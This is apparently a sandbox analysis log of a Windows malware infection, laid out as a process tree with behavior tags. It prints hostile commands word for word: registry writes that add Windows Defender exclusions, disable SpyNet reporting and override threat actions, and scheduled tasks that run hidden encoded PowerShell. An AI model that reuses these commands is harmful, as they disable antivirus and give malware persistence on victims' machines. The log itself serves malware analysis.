C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404031108111\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404031108111\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0xe60040,0xe6004c,0xe600585⤵
- Executes dropped EXE
- Loads dropped DLL
PID:880
-
-
-
-
C:\Users\Admin\Pictures\8WRinhYPmXJoVFf980Ft3cF1.exe"C:\Users\Admin\Pictures\8WRinhYPmXJoVFf980Ft3cF1.exe"3⤵
- Executes dropped EXE
PID:4924 -
C:\Users\Admin\AppData\Local\Temp\7zSA97E.tmp\Install.exe.\Install.exe /dEKGWdidYWnQ "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:2108 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵PID:4512
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵PID:3160
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵PID:1116
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵PID:4900
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵PID:404
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵PID:3128
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵PID:4492
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵PID:2008
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfWPSzmcl" /SC once /ST 10:58:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
PID:3804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfWPSzmcl"5⤵PID:1124
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfWPSzmcl"5⤵PID:1272
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 11:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\SnjMgxW.exe\" hl /vMsite_idCXg 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1244
-
-
-
-
C:\Users\Admin\Pictures\cymoeqqwvGpbZ2JBspmlizbe.exe"C:\Users\Admin\Pictures\cymoeqqwvGpbZ2JBspmlizbe.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3784 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe4⤵
- Executes dropped EXE
PID:1124 -
C:\Windows\SYSTEM32\msiexec.exe"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe"ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"5⤵
- Executes dropped EXE
PID:2032
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 984 -ip 9841⤵PID:1984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2236
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3236
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:576
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1464
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3264 -ip 32641⤵PID:3980
-
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\SnjMgxW.exeC:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\SnjMgxW.exe hl /vMsite_idCXg 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2104 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3476 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:2824
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4524
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4008
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:323⤵PID:5072
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:324⤵PID:3080
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:643⤵PID:1804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:323⤵PID:1908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:643⤵PID:3128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:323⤵PID:3176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:643⤵PID:1336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:323⤵PID:5116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:643⤵PID:3896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:323⤵PID:2972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:643⤵PID:408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:323⤵PID:3860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:643⤵PID:656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4512
-
-
